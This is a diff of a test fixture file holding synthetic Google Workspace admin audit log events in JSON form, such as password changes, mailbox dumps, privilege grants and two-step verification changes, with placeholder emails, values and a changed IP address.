-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} 